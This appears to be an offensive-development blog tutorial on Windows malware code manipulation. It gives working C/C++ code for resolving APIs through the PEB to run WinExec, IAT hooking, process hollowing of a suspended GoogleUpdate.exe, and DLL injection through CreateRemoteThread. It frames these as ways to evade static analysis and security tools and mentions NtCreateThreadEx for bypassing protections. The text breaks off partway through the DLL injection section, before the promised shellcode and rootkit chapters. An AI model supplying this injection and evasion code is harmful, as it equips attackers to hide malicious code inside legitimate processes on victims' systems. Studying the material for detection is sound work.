Table of Contents

1. Static Calls in Malware  
   1.1. PEB Structure  
   1.2. Dynamic Function Loading (IAT Hooking)  

2. Process Injection Techniques
   2.1. Process Hollowing
   - 2.1.1. Creating the Target Process  
   - 2.1.2. Injecting the New Image  
   - 2.1.3. Detecting and Running the Hollowed Process  
   
   2.2. DLL Injection 
   - 2.2.1. Attaching to the Process  
   - 2.2.2. Allocating Memory in the Target Process  
   - 2.2.3. Copying the DLL  
   - 2.2.4. The Starting Point  
   - 2.2.5. Executing the DLL  

3. Shellcode Playbook
   3.1. Process Injection
   3.2. Shellcode Obfuscation  

4. Writing a Simple Rootkit
   4.1. Writing a Windows Device Driver  
   4.2. Kernel-Mode DLL  
   4.3. DLL Injection Methods  
   - 4.3.1. Traditional DLL Injection  
   - 4.3.2. DLL Injection via APC  

This post will focus on offensive development, particularly on code manipulation in malware. We’ll begin by exploring both high-level and low-level approaches. Topics will include dynamically loading functions and working with the Process Environment Block (PEB) to execute code. We’ll also look at obfuscation techniques, like using XOR and AES encryption to make detection more challenging. Methods such as shellcode and DLL injection will be discussed for injecting code. Finally, we’ll cover kernel-level injection with a rootkit twist. Each technique will be explained with code examples and step-by-step instructions.

This post outlines the basic requirements and research needed for the project, gives it a rough structure, and defines the general goals. Future posts will dive deeper into specifics. Where better sources explain a concept, I’ll reference them, along with thorough documentation of sources and additional material for further research.

For this, you should have some familiarity with the following areas:

That said, I’ll aim to make each topic as clear as possible. If I find better explanations or useful resources, I’ll include links at the end of the article.

Static Function Calls

Alright, let’s start with the basics. This is about as simple as it gets: a direct, statically linked call to MessageBoxA. At build time, the linker records in the executable’s import table that MessageBoxA comes from user32.dll, and the Windows loader fills in the real address when the program starts. When you run the program, Windows pops up a message box that says, “Foo Here.”

#include <windows.h>

int main(void) {
    MessageBoxA(0, "Foo Here.", "info", 0);
    return 0;
}

Easy, right? But here’s the catch: this method is extremely predictable. Security tools, like static analysis engines, can easily scan the binary and know you’re calling MessageBoxA. This is great for clarity, but not so great if you’re writing something more complex—say, code that needs to avoid detection.

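#include <windows.h>

// Function pointer type matching MessageBoxA's signature.
typedef int (WINAPI *def_MessageBoxA)(HWND, LPCSTR, LPCSTR, UINT);

int main(void) {
    size_t get_MessageBoxA = (size_t)GetProcAddress(LoadLibraryA("USER32.dll"), "MessageBoxA");
    def_MessageBoxA msgbox_a = (def_MessageBoxA)get_MessageBoxA;
    msgbox_a(0, "Foo Here.", "info", 0);
    return 0;
}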

Okay, what changed here? Instead of letting the linker handle everything for us, we’re dynamically loading the MessageBoxA function. First, we load the USER32.dll library at runtime using LoadLibraryA. Then, we ask for the address of the MessageBoxA function inside that library using GetProcAddress.

Notice how we’re no longer depending on compile-time linking. The function address isn’t resolved until the program is already running, and MessageBoxA no longer appears in the import table. That makes it trickier for static analysis tools that rely on imports, although the name string itself is still present in the binary.

This technique is widely used in malware to hide behavior from basic detection methods. If a piece of malware doesn’t explicitly reference suspicious functions, it’s harder for security tools to flag it.

Let’s take it a step further now. What if you want to manipulate behavior dynamically, perhaps by hooking into existing code? Check this out:

__declspec(dllexport) void func01() { MessageBoxA(0, "", "Function 1", 0); }
__declspec(dllexport) void func02() { MessageBoxA(0, "", "Function 2", 0); }

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved) {
    if (fdwReason == DLL_PROCESS_ATTACH) {
        // Hook function func01
    }
    return TRUE;
}

Here, we’ve introduced function hooking inside a DLL. Now, func01 and func02 both display simple message boxes when called. But what’s interesting is what happens in DllMain. When this DLL gets loaded into a process (thanks to DLL_PROCESS_ATTACH), we could hook into func01 and change its behavior at runtime.

So now, instead of just dynamically loading a function like before, we’re dynamically changing how functions behave while the program runs. Hooking functions this way to intercept and alter behavior is another technique often used by malware, and also by legitimate applications for debugging or monitoring.

So far, we’ve just been working on the surface. But what if you need to go under the hood and start poking around in how Windows manages processes? Enter the PEB (Process Environment Block), a treasure trove of information about running processes.

When Windows starts a process such as calc.exe, it goes through roughly these steps:

  1. Creating the process data structures: Windows creates the EPROCESS structure in kernel land for the newly created calc.exe process.
  2. Initializing the virtual memory: Windows creates the process’s virtual memory and its representation of the physical memory, and saves it inside the EPROCESS structure.
  3. Creating the PEB: Windows creates the PEB structure with all the necessary information.
  4. Loading the core DLLs: Windows loads the two main DLLs that Windows applications always need, ntdll.dll and kernel32.dll.
  5. Loading the PE file and starting execution.

The PEB is a data structure in the Windows operating system that contains information and settings related to a running process, and it lives in the process’s own user-mode address space. By contrast, the process control block contains data that is only useful to the kernel, such as the preferred CPU for the process. The thread control block is entirely different: it is what the kernel uses to manage threads, which are what the kernel actually runs at the lowest level.

In the code that follows, the PEB is accessed to retrieve information about loaded modules, specifically the base addresses of dynamically linked libraries (DLLs). Let’s explore how the PEB is used in the code:

typedef struct _PEB_LDR_DATA {
ULONG Length;
UCHAR Initialized;
PVOID SsHandle;
LIST_ENTRY InLoadOrderModuleList;
LIST_ENTRY InMemoryOrderModuleList;
LIST_ENTRY InInitializationOrderModuleList;
PVOID EntryInProgress;
} PEB_LDR_DATA, *PPEB_LDR_DATA; 

typedef struct _UNICODE_STRING32 {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING32, *PUNICODE_STRING32;

typedef struct _PEB32 {
    // ...
} PEB32, *PPEB32;

typedef struct _PEB_LDR_DATA32 {
    // ...
} PEB_LDR_DATA32, *PPEB_LDR_DATA32;

typedef struct _LDR_DATA_TABLE_ENTRY32 {
    // ...
} LDR_DATA_TABLE_ENTRY32, *PLDR_DATA_TABLE_ENTRY32;

As you can see, the PEB is a robust structure. The code defines several structures, such as PEB32, PEB_LDR_DATA32, and LDR_DATA_TABLE_ENTRY32, which are simplified versions of the actual PEB data structures. These structures contain fields that hold information about loaded modules and their locations in memory.

size_t GetModHandle(wchar_t *libName) {
    PEB32 *pPEB = (PEB32 *)__readfsdword(0x30); // x86 only: fs:[0x30] holds the PEB pointer
    PLIST_ENTRY header = &(pPEB->Ldr->InMemoryOrderModuleList);

    for (PLIST_ENTRY curr = header->Flink; curr != header; curr = curr->Flink) {
        LDR_DATA_TABLE_ENTRY32 *data = CONTAINING_RECORD(
            curr, LDR_DATA_TABLE_ENTRY32, InMemoryOrderLinks
        );
        printf("current node: %ls\n", data->BaseDllName.Buffer);
        if (StrStrIW(libName, data->BaseDllName.Buffer))
            return data->DllBase;
    }
    return 0;
}

The GetModHandle function accesses the PEB to find the base address of a loaded module. The PEB contains a data structure called PEB_LDR_DATA that manages information about loaded modules. The InMemoryOrderModuleList field of this structure is a linked list of loaded modules. The GetModHandle function iterates through this list and compares module names to find the desired module based on the libName parameter.
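
The list walk is easier to follow in isolation. The following is a minimal, portable sketch rather than the real loader structures: `list_entry`, `module_entry`, `container_of`, and `find_module` are hypothetical stand-ins for LIST_ENTRY, LDR_DATA_TABLE_ENTRY32, CONTAINING_RECORD, and GetModHandle. It shows the two ideas the function depends on: the list is circular, so the walk stops when it gets back to the head, and each node is a link embedded inside a larger record.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical stand-in for LIST_ENTRY: a circular doubly linked list node. */
typedef struct list_entry {
    struct list_entry *flink;  /* next node */
    struct list_entry *blink;  /* previous node */
} list_entry;

/* Hypothetical stand-in for a loader table entry. */
typedef struct module_entry {
    const char *name;   /* plays the role of BaseDllName */
    list_entry  links;  /* embedded links, like InMemoryOrderLinks */
    size_t      base;   /* plays the role of DllBase */
} module_entry;

/* Same idea as CONTAINING_RECORD: step back from the embedded field
   to the start of the structure that contains it. */
#define container_of(ptr, type, field) \
    ((type *)((char *)(ptr) - offsetof(type, field)))

static void list_init(list_entry *head) {
    head->flink = head->blink = head;
}

static void list_push_back(list_entry *head, list_entry *node) {
    node->flink = head;
    node->blink = head->blink;
    head->blink->flink = node;
    head->blink = node;
}

/* Walk the list until we are back at the head, comparing names. */
static size_t find_module(list_entry *head, const char *name) {
    assert(head != NULL && name != NULL);
    for (list_entry *cur = head->flink; cur != head; cur = cur->flink) {
        module_entry *m = container_of(cur, module_entry, links);
        if (strcmp(m->name, name) == 0)
            return m->base;
    }
    return 0;  /* not found */
}
```

Because the links sit in the middle of the record, the pointer stored in the list is not the address of the record itself. That is why the subtraction done by the macro is needed before any field can be read.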

A pointer to the PEB is stored in the Thread Environment Block (TEB): at fs:[0x30] for x86 processes and at gs:[0x60] for x64 processes.

Next we call the GetFuncAddr function, which will be used to locate the address of a specific function within a loaded module. It takes the moduleBase parameter, which is the base address of the module, and looks into the module’s export table to find the address of the function with the specified name (szFuncName). The export table is part of the module’s PE image in memory; the PEB only supplies the base address from which we reach it.

size_t GetFuncAddr(size_t moduleBase, char* szFuncName) {

// parse export table
PIMAGE_DOS_HEADER dosHdr = (PIMAGE_DOS_HEADER)(moduleBase);
PIMAGE_NT_HEADERS ntHdr = (PIMAGE_NT_HEADERS)(moduleBase + dosHdr->e_lfanew);
IMAGE_OPTIONAL_HEADER optHdr = ntHdr->OptionalHeader;
IMAGE_DATA_DIRECTORY dataDir_exportDir = optHdr.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];

// parse exported function info

PIMAGE_EXPORT_DIRECTORY exportTable = (PIMAGE_EXPORT_DIRECTORY)(moduleBase + dataDir_exportDir.VirtualAddress);
DWORD* arrFuncs = (DWORD *)(moduleBase + exportTable->AddressOfFunctions);
DWORD* arrNames = (DWORD *)(moduleBase + exportTable->AddressOfNames);
WORD* arrNameOrds = (WORD *)(moduleBase + exportTable->AddressOfNameOrdinals);

The function begins by parsing the export table of the loaded module to access information about its exported functions. The export table is part of the Portable Executable (PE) file format and contains details about functions that can be accessed externally.

  1. It accesses the DOS header and the NT header to navigate to the Optional Header of the PE file.
  2. It identifies the data directory for exports using the IMAGE_DIRECTORY_ENTRY_EXPORT index into the Optional Header’s data directory array.
  3. It calculates the address of the export table, which holds data related to the module’s exported functions.
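
The same header navigation can be sketched without the Windows headers, working on a plain byte buffer. This is a simplified illustration, not a full parser: the helper names (`rd16`, `rd32`, `pe_optional_header_offset`, `pe_export_rva`) are made up for this example, and the offsets are the standard PE layout ones (e_lfanew at 0x3C, a 4-byte signature, a 20-byte file header, and the data directory at offset 96 of a PE32 optional header or 112 of a PE32+ one).

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Read little-endian integers without assuming alignment. */
static uint16_t rd16(const uint8_t *p) {
    return (uint16_t)(p[0] | (p[1] << 8));
}

static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Step 1: DOS header -> NT headers -> Optional Header.
   Returns the offset of the Optional Header, or 0 if the buffer is not a PE. */
static size_t pe_optional_header_offset(const uint8_t *buf, size_t len) {
    assert(buf != NULL);
    if (len < 0x40 || rd16(buf) != 0x5A4D)          /* "MZ" magic */
        return 0;
    uint32_t e_lfanew = rd32(buf + 0x3C);           /* offset of the NT headers */
    if (e_lfanew > len - 24)                        /* signature + file header must fit */
        return 0;
    if (memcmp(buf + e_lfanew, "PE\0\0", 4) != 0)   /* NT signature */
        return 0;
    return (size_t)e_lfanew + 4 + 20;               /* skip signature and file header */
}

/* Steps 2 and 3: pick data directory entry 0 (exports) and return its RVA.
   Returns 0 if the image is invalid or has no export directory. */
static uint32_t pe_export_rva(const uint8_t *buf, size_t len) {
    size_t opt = pe_optional_header_offset(buf, len);
    if (opt == 0 || opt + 2 > len)
        return 0;
    uint16_t magic = rd16(buf + opt);
    if (magic != 0x10B && magic != 0x20B)           /* PE32 or PE32+ */
        return 0;
    size_t dir = opt + (magic == 0x20B ? 112 : 96); /* start of the data directory */
    if (dir + 8 > len)
        return 0;
    return rd32(buf + dir);                         /* VirtualAddress of entry 0 */
}
```

The value returned is a relative virtual address. As in GetFuncAddr, it only becomes a usable pointer once it is added to the base address the module is loaded at.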

Next, inside the loop, it compares the current exported function’s name (sz_CurrApiName) with the target function name (szFuncName) using a case-insensitive comparison. When a match is found, the function prints information about the matching function, including its name and ordinal.

// lookup
for (size_t i = 0; i < exportTable->NumberOfNames; i++) {
char* sz_CurrApiName = (char *)(moduleBase + arrNames[i]);
WORD num_CurrApiOrdinal = arrNameOrds[i] + 1;
if (!stricmp(sz_CurrApiName, szFuncName)) {
printf("[+] Found ordinal %.4x - %s\n", num_CurrApiOrdinal, sz_CurrApiName); //enumeration process 
return moduleBase + arrFuncs[ num_CurrApiOrdinal - 1 ];
}
}
return 0;
}

If the target function name matches the current function name, the function returns the address of that function. It calculates the function’s address by referencing the arrFuncs array and the ordinal. The ordinal, when converted to an index, helps retrieve the correct address from the array.
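
The relationship between the three arrays is the part that tends to confuse people, so here is a small portable model of it. The `export_table` struct and `lookup_export_rva` are hypothetical simplifications: real export tables store RVAs to the names rather than C pointers, and this sketch uses a case-sensitive comparison. The point it illustrates is that the position of a name in the names array is not the position of its address in the functions array; the ordinals array translates one into the other.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical, simplified export table mirroring AddressOfNames,
   AddressOfNameOrdinals and AddressOfFunctions. */
typedef struct export_table {
    uint32_t        number_of_names;
    const char    **names;          /* exported names */
    const uint16_t *name_ordinals;  /* names[i] -> index into functions */
    const uint32_t *functions;      /* function RVAs */
} export_table;

/* Find a name, translate its position through the ordinals array,
   and return the matching function RVA (0 if the name is absent). */
static uint32_t lookup_export_rva(const export_table *t, const char *name) {
    assert(t != NULL && name != NULL);
    for (uint32_t i = 0; i < t->number_of_names; i++) {
        if (strcmp(t->names[i], name) == 0)
            return t->functions[t->name_ordinals[i]];
    }
    return 0;
}
```

In this model the functions array may be longer than the names array, which matches real modules where some functions are exported by ordinal only.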

Why is this important? This technique is usually how code injection is performed, and yes, it is dynamic function loading again. Now let’s take a look at the main function.

int main(int argc, char** argv, char** envp) {
    size_t kernelBase = GetModHandle(L"kernel32.dll");
    printf("[+] GetModHandle(kernel32.dll) = %p\n", (void *)kernelBase); // result of `GetModHandle`

    size_t ptr_WinExec = (size_t)GetFuncAddr(kernelBase, "WinExec");
    printf("[+] GetFuncAddr(kernel32.dll, WinExec) = %p\n", (void *)ptr_WinExec); // the address of `WinExec`
    ((UINT(WINAPI*)(LPCSTR, UINT))ptr_WinExec)("calc", SW_SHOW);
    return 0;
}

We call the GetModHandle function to find the base address of the “kernel32.dll” module in the current process. It uses the PEB to traverse the list of loaded modules and search for the one with the specified name. Next we call GetFuncAddr to locate the address of WinExec, passing the base address of “kernel32.dll” obtained in the previous step and the function name “WinExec” as arguments. Finally, the code invokes WinExec through the address obtained earlier: it casts ptr_WinExec to the appropriate function pointer type and calls it with the arguments “calc” (to run the Windows Calculator) and SW_SHOW.

This demonstrates how to dynamically locate and execute the WinExec function from the “kernel32.dll” module, effectively opening the Calculator. It shows how code manipulation can be achieved by accessing the PEB and then locating and using specific functions from loaded modules.

Alright, let’s back up a little bit and look at this in the context of code injection. Here’s the line to explore further:

((UINT(WINAPI*)(LPCSTR, UINT))ptr_WinExec)("calc", SW_SHOW);

This line dynamically invokes the WinExec function to open the Windows Calculator. In essence, what’s occurring here is this:

Rather than statically linking to WinExec, the code locates the function at run time and calls it through a pointer, all from inside its own process. Dynamic function loading is a technique often employed in malware to access specific functions without the need for direct imports, making it more evasive.

It’s important to note that in this code example, opening the Windows Calculator is a benign action. However, it serves as an illustrative case of the dynamic function invocation that code injection builds on.

This technique is at the heart of many code injection and malware techniques. By dynamically locating and invoking functions, malware can avoid leaving obvious traces, making it harder for security tools to detect what’s going on. The dynamic approach lets attackers modify behavior on the fly, adapt to different environments, and evade static analysis by not embedding suspicious calls directly into the binary.

Dynamic Function Loading (IAT Hooking)

When you call a function like MessageBoxA, which is exported from an external library (user32.dll in this case), the call doesn’t jump directly to the actual code for the message box. Instead, it goes through what is called the Import Address Table (IAT). The IAT is like a phonebook that contains the addresses of the functions the program imports from external libraries.

  1. The application calls MessageBoxA.
  2. Instead of directly jumping to the actual MessageBoxA code, the program looks up the function’s address in the IAT.
  3. The IAT contains a pointer to the real MessageBoxA function in user32.dll.
  4. The application jumps to that address and executes the function.

So, whenever a function like MessageBoxA is called, the application checks the IAT for the function’s location. It’s a sort of “indirect calling mechanism.”
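
The indirection itself can be modeled in a few lines of portable C. This is only a toy model under stated assumptions: `import_slot` stands in for a single IAT entry, and `real_api`, `call_api`, `install_hook`, `remove_hook`, and `scaling_hook` are hypothetical names invented for the sketch. It shows why swapping one pointer is enough to redirect every caller that goes through the table.

```c
#include <assert.h>
#include <stddef.h>

typedef int (*api_fn)(int);

/* The "real" implementation, playing the role of the library function. */
static int real_api(int x) { return x + 1; }

/* Hypothetical one-slot import table: callers never call real_api
   directly, only whatever pointer currently sits in the slot. */
static api_fn import_slot = real_api;

/* Every call site goes through the slot, like a call through the IAT. */
static int call_api(int x) { return import_slot(x); }

static api_fn saved_original = NULL;

/* A replacement that forwards to the original and alters the result,
   so the redirection is visible to the caller. */
static int scaling_hook(int x) { return saved_original(x) * 10; }

/* Save the current slot value, then overwrite it with the replacement. */
static void install_hook(api_fn replacement) {
    assert(replacement != NULL);
    saved_original = import_slot;
    import_slot = replacement;
}

/* Put the original pointer back. */
static void remove_hook(void) {
    if (saved_original != NULL) {
        import_slot = saved_original;
        saved_original = NULL;
    }
}
```

Keeping the original pointer around matters for two reasons: the replacement usually wants to forward to the real function, and the slot can be restored afterwards. The same property makes this kind of change visible to monitoring tools, which can compare table entries against the addresses the exporting module actually provides.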

Application            IAT                         user32.dll
+-------------+     +---------------+            +------------------+
| call        |     | MessageBoxA   |            | MessageBoxA code |
| MessageBoxA +---> | (jmp to addr) +----------> |                  |
+-------------+     +---------------+            +------------------+

First, the target program calls a WinAPI function such as MessageBoxA. The program looks up the address of MessageBoxA in the IAT and jumps to the user32!MessageBoxA address stored there, which is where the real code for displaying the message box lives. The two helper macros below locate the NT headers and the section header array of a mapped module:

#define getNtHdr(buf) ((IMAGE_NT_HEADERS *)((size_t)buf + ((IMAGE_DOS_HEADER *)buf)->e_lfanew))
#define getSectionArr(buf) ((IMAGE_SECTION_HEADER *)((size_t)buf + ((IMAGE_DOS_HEADER *)buf)->e_lfanew + sizeof(IMAGE_NT_HEADERS))

To recap: when the application code calls MessageBoxA, it does not call the function’s code directly. Instead, it looks up the address of the function in the IAT, which contains entries for the various imported functions, and execution jumps to that address. Normally, the resolved address points to the legitimate user32!MessageBoxA function.

size_t ptr_msgboxa = 0;
void iatHook(char *module, const char *szHook_ApiName, size_t callback, size_t &apiAddr)
{
    auto dir_ImportTable = getNtHdr(module)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];
    auto impModuleList = (IMAGE_IMPORT_DESCRIPTOR *)&module[dir_ImportTable.VirtualAddress];
    for (; impModuleList->Name; impModuleList++)
    {
        auto arr_callVia = (IMAGE_THUNK_DATA *)&module[impModuleList->FirstThunk];
        auto arr_apiNames = (IMAGE_THUNK_DATA *)&module[impModuleList->OriginalFirstThunk];
        for (int i = 0; arr_apiNames[i].u1.Function; i++)
        {
            auto curr_impApi = (PIMAGE_IMPORT_BY_NAME)&module[arr_apiNames[i].u1.Function];
            if (!strcmp(szHook_ApiName, (char *)curr_impApi->Name))
            {
                apiAddr = arr_callVia[i].u1.Function;
                arr_callVia[i].u1.Function = callback;
                break;
            }
        }
    }
}

int main(int argc, char **argv)
{
    void (*ptr)(UINT, LPCSTR, LPCSTR, UINT) = [](UINT hwnd, LPCSTR lpText, LPCSTR lpTitle, UINT uType) {
        printf("[hook] MessageBoxA(%i, \"%s\", \"%s\", %i)", hwnd, lpText, lpTitle, uType);
        ((UINT(*)(UINT, LPCSTR, LPCSTR, UINT))ptr_msgboxa)(hwnd, "msgbox got hooked", "alert", uType);
    };

    iatHook((char *)GetModuleHandle(NULL), "MessageBoxA", (size_t)ptr, ptr_msgboxa);
    MessageBoxA(0, "Hook Test", "title", 0);
    return 0;
}

So what’s going on here? Instead of executing the legitimate user32!MessageBoxA function, the IAT entry for MessageBoxA is modified to point to a replacement function (the ptr function in the code). As a result, when the application makes a call to MessageBoxA, it actually calls the replacement function, which can alter or extend the behavior of the original function call.

So what have we accomplished here? By modifying the IAT, we’ve redirected the function call to our own custom code. This means you can alter how MessageBoxA behaves, or any other API function you want to hook. IAT hooking is neat because it allows you to change the behavior of a program without modifying the original code, just by tampering with the IAT. This can be used for legitimate purposes like debugging or monitoring, but it’s also a technique widely used in malware to hide or change what certain functions do.

In short, IAT hooking lets you insert yourself into the flow of function calls, modifying behavior or collecting information without directly altering the original program’s code. This is dynamic function loading at its core, taking control of how and when certain functions execute.

Process Hollowing

Alright, let’s transition into something cooler and tie everything we’ve learned together, starting with dynamic function loading and IAT hooking. Process hollowing is like taking the techniques we’ve been discussing and pushing them into the realm of complete process takeover.

Process hollowing allows you to spawn a legitimate process but take control of it by injecting malicious code. It’s all about leveraging a legitimate-looking process while doing something entirely different underneath.

So, how does process hollowing actually work? It begins with creating a new instance of a legitimate process in a suspended state. Think of it like freezing the process right after it’s created but before it has a chance to do anything. This gives us the perfect opportunity to inject our own code into the process, letting it run under the cover of something legitimate.

To pull off process hollowing, the injected code has to meet certain requirements to ensure everything runs smoothly. The code (or source image) being injected needs to be in PE format (Portable Executable), which is the standard executable format on Windows. It needs executable code that the system can actually run, typically found in the .text section. You also need to know the Address of Entry Point (AEP), which is basically where the injected code starts executing. This address will later guide the process on where to begin executing the new image. Additionally, sections like .data and .rdata need to be properly mapped so that everything works as expected once the hollowing is complete.

Let’s Create the Process

At the core of process hollowing is the ability to create a process in a suspended state, inject new code, and then replace the original image:

if (CreateProcessA(path, 0, 0, 0, false, CREATE_SUSPENDED, 0, 0, &SI, &PI)) 
{
    // Allocate memory for the context.
    CTX = LPCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));
    CTX->ContextFlags = CONTEXT_FULL; // Context is allocated

    // Retrieve the context.
    if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) //if context is in thread
    {
        pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),
            NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);

        // File Mapping
        WriteProcessMemory(PI.hProcess, pImageBase, Image, NtHeader->OptionalHeader.SizeOfHeaders, NULL);
        for (int i = 0; i < NtHeader->FileHeader.NumberOfSections; i++)
            WriteProcessMemory
            (
                PI.hProcess, 
                LPVOID((size_t)pImageBase + SectionHeader[i].VirtualAddress),
                LPVOID((size_t)Image + SectionHeader[i].PointerToRawData), 
                SectionHeader[i].SizeOfRawData, 
                0
            );
    }
}

This code uses the CreateProcessA function to launch a new process, but with one catch: the CREATE_SUSPENDED flag, which leaves the new process’s main thread suspended.

Now that the process is suspended, we grab the context of its main thread (essentially the thread’s saved state, including its registers). We use this context to inject our own code and get the process to execute it. The context helps us set things like the entry point, ensuring that when the process resumes, it runs our code instead of the original executable’s code.

Injecting the New Image

Here comes the tricky part—injecting the new image into the process. We first allocate memory inside the target process using VirtualAllocEx to store our new executable image. Then, we copy over the headers and sections of the PE file (remember, this is the executable we’re injecting).

for (int i = 0; i < NtHeader->FileHeader.NumberOfSections; i++) {
    WriteProcessMemory(
        PI.hProcess, 
        LPVOID((size_t)pImageBase + SectionHeader[i].VirtualAddress),
        LPVOID((size_t)Image + SectionHeader[i].PointerToRawData), 
        SectionHeader[i].SizeOfRawData, 
        0
    );
}

At this point, we’ve successfully injected the new image. The suspended process is now housing our code, but it’s still paused. To make it run, we need to adjust the process’s entry point to point to the start of our injected code.

Now that the process is loaded with our code, we need to update its execution context so it starts running from the correct point. Here’s where we set the EAX register to point to the address of the entry point (the starting point for execution):

WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&pImageBase), 4, 0);
CTX->Eax = DWORD(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;
SetThreadContext(PI.hThread, LPCONTEXT(CTX)); 
ResumeThread(PI.hThread);

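We update the context so that EAX holds the address of the new entry point. EAX is not the instruction pointer itself: in the initial context of a suspended 32-bit process, EAX carries the entry point the thread will start from and EBX points to the PEB, which is why the code also writes the new image base at Ebx + 8 (the PEB’s ImageBaseAddress field). The process, when resumed, will jump straight into our code as if it were the original.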

With ResumeThread, the suspended process is brought back to life, but now it’s running our code instead of the original executable’s.

Detecting and Running the Hollowed Process

This last piece of code checks whether the current executable’s path contains the name of the hollowing target. If it detects the right executable, it enters the branch that holds the hollowing routine. Otherwise, it might just run the normal process:

char CurrentFilePath[MAX_PATH + 1];
GetModuleFileNameA(0, CurrentFilePath, MAX_PATH);
if (strstr(CurrentFilePath, "GoogleUpdate.exe")) {
    MessageBoxA(0, "foo", "", 0);
    return 0;

    LONGLONG len = -1;
    RunPortableExecutable("GoogleUpdate.exe", MapFileToMemory(CurrentFilePath, len));
    return 0;
}

This section ensures that the process hollowing only takes place for a specific target, in this case "GoogleUpdate.exe". Note that, as written, the branch shows a message box and returns immediately, so the RunPortableExecutable call after the first return is never reached. This step is critical in deciding whether to perform the hollowing or let the process run normally.

Process hollowing takes what we’ve learned about dynamic function loading and memory manipulation and dials it up to a full-blown process takeover. By creating a process in a suspended state, injecting new code, and setting the context to start from our injected code, we essentially “hollow out” the legitimate process and replace it with our own execution. The legitimate process acts as a shell, making the injected process harder to detect, especially by static analysis tools.

This technique, like the others we’ve seen, showcases the fine line between low-level Windows programming and the sort of behavior typically seen in malware. It’s all about control: taking over a real (legit) process and making it do something entirely different without anyone being the wiser.

DLL Injection Techniques

Alright, want something even cooler? Here’s DLL injection, which is essentially about sneaking your own code into the memory space of an already running process. The neat part is that this code is in the form of a Dynamic Link Library (DLL), and once you’ve inserted your code, the process will start executing it, making it seem like a part of its normal operations. This technique isn’t just used by malware; it’s also helpful for debugging and other legit stuff. But as you might guess, injecting code into another process requires privileges on the system, especially when you want to manipulate the memory of other programs.

The key to DLL injection is leveraging the Windows API, which provides a suite of functions to interact with processes, manipulate their memory, and ultimately force them to execute your injected code. We can break down the injection process into five core steps:

Attaching to the Process

The first step in injecting a DLL is getting access to the target process. This is done using the OpenProcess() function, which grants us the necessary rights to manipulate the process. We need access rights like PROCESS_VM_OPERATION and PROCESS_CREATE_THREAD to work with the target’s memory and create new threads inside it.

hHandle = OpenProcess( PROCESS_CREATE_THREAD | 
                       PROCESS_QUERY_INFORMATION | 
                       PROCESS_VM_OPERATION | 
                       PROCESS_VM_WRITE | 
                       PROCESS_VM_READ, 
                       FALSE, 
                       procID );

This handle allows us to interact with the process, which is critical when you’re trying to inject code. Without this access, you’re just knocking on the door with no way in.

Allocating Memory in the Target Process

Next up, we need some space inside the target process’s memory to put our DLL. This is where VirtualAllocEx() comes into play. Depending on your method, you either allocate memory for the DLL path (if using LoadLibraryA()) or the full contents of the DLL itself (if directly jumping to DllMain or some other entry point).

GetFullPathName(TEXT("foo.dll"), 
                BUFSIZE, 
                dllPath, //Output to save the full DLL path
                NULL);

dllPathAddr = VirtualAllocEx(hHandle, 
                             0, 
                             strlen(dllPath), 
                             MEM_RESERVE|MEM_COMMIT, 
                             PAGE_EXECUTE_READWRITE);

The key here is that we’ve reserved space in the target process to store the path to our DLL. This is the address where the DLL’s name will live inside the target’s memory.

Copying the DLL

Once we have allocated space, we need to fill that space with either the DLL itself or the path to it, depending on the method. If you’re using the LoadLibraryA() approach, you just copy the path of the DLL into the allocated memory space. For copying, we use WriteProcessMemory().

WriteProcessMemory(hHandle, 
                   dllPathAddr, 
                   dllPath, 
                   strlen(dllPath), 
                   NULL);

If, on the other hand, we are loading the entire DLL into memory, we would first open the DLL file and read its contents into memory before writing it to the target process:

hFile = CreateFileA( dllPath, 
                     GENERIC_READ, 
                     0, 
                     NULL, 
                     OPEN_EXISTING, 
                     FILE_ATTRIBUTE_NORMAL, 
                     NULL );

dllFileLength = GetFileSize(hFile, NULL);

remoteDllAddr = VirtualAllocEx(hProcess, 
                               NULL, 
                               dllFileLength, 
                               MEM_RESERVE|MEM_COMMIT, 
                               PAGE_EXECUTE_READWRITE );

ReadFile(hFile, lpBuffer, dllFileLength, &dwBytesRead, NULL);

WriteProcessMemory(hProcess, remoteDllAddr, lpBuffer, dllFileLength, NULL);

This method gives you more control and avoids some of the downsides of LoadLibraryA(), like the fact that it registers the DLL in the process’s list of loaded modules (which is easier to detect).

The Starting Point

Now that we’ve got our DLL (or DLL path) sitting in the target process’s memory, we need to tell the process where to begin execution. Most of the time, we either execute LoadLibraryA() or jump directly to the DllMain function of the DLL.

If we’re using LoadLibraryA(), we need to get its address using GetProcAddress():

loadLibAddr = GetProcAddress(GetModuleHandle(TEXT("kernel32.dll")), "LoadLibraryA");

Then we pass this address to our execution function, along with the memory address of the DLL path. This tells the target process to load the DLL we’ve injected using its own resources.

Executing the DLL

Now comes the moment of truth—executing the DLL. The most popular way to do this is by creating a new thread in the target process using CreateRemoteThread(). This function allows us to tell the process to start executing at the address of LoadLibraryA() or some other entry point we choose.

rThread = CreateRemoteThread(hTargetProcHandle, NULL, 0, lpStartExecAddr, lpExecParam, 0, NULL);
WaitForSingleObject(rThread, INFINITE);

In this case, we pass in the memory address where we want the process to start execution (lpStartExecAddr) and the parameters we want to pass (in this case, the memory address of the DLL path).

Alternatively, you can use NtCreateThreadEx(), an undocumented function from ntdll.dll. This function is similar to CreateRemoteThread() but sometimes bypasses certain security measures.

struct NtCreateThreadExBuffer {
 ULONG Size;
 ULONG Unknown1;
 ULONG Unknown2;
 PULONG Unknown3;
 ULONG Unknown4;
 ULONG Unknown5;
 ULONG Unknown6;
 PULONG Unknown7;
 ULONG Unknown8;
}; 

